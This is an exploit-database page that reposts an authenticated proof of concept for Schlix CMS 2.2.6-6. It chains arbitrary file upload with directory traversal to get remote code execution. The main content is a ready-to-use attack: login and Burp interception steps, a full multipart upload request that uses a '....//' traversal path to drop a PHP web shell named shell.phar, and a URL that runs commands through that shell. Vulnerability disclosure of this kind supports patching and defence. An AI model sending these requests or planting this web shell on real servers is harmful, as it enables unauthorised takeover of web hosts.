Schlix cms 2.2.66 arbitary file upload and directory traversal leads to rce (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-05-24 | Type : webapps | Platform : multiple
This exploit / vulnerability Schlix cms 2.2.66 arbitary file upload and directory traversal leads to rce (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
# Date: 21.05.2021
# Exploit Author: Emir Polat
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: 2.2.6-6
# Tested On: Ubuntu 20.04 (Firefox)

############################################################################################################

Summary: An authorized user can upload a file with a .phar extension
to a path of his choice and control the content as he wishes. This causes RCE vulnerability.

For full technical details and source code analysis:
https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.

############################################################################################################

PoC:

1-) Login to admin panel with true credentials and go to "Tools ->
Mediamanager" menu from left side.

2-) Click the "Upload File" and upload a file and catch the request with Burp.

3-) Change the "uploadstartpath", "filename" and file content as follows.

# Request

POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
Host: vulnerable-server
Content-Length: 846
X-Schlix-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
Accept: */*
Origin: http:// <http://10.211.55.4/>vulnerable-server
Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
<http://10.211.55.4/schlix/admin/app/core.mediamanager>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
schlix-your-cookie;__atuvc=5%7C20;
schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2;
schlix_frontendedit_control_showdoc=-2
Connection: close

------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="_csrftoken"

{your_csrf_token}
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="uploadstartpath"

/media/docs/....//....//....//....//system/images/avatars/large/
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"

<?PHP system($_GET['rce']);?>

------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__total_file_size"

0
------WebKitFormBoundarybllOFLruz1WAs7K2
Content-Disposition: form-data; name="filedata__max_file_count"

20
------WebKitFormBoundarybllOFLruz1WAs7K2--


4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".

Schlix cms 2.2.66 arbitary file upload and directory traversal leads to rce (authenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Schlix cms 2.2.66 arbitary file upload and directory traversal leads to rce (authenticated) Vulnerability / Exploit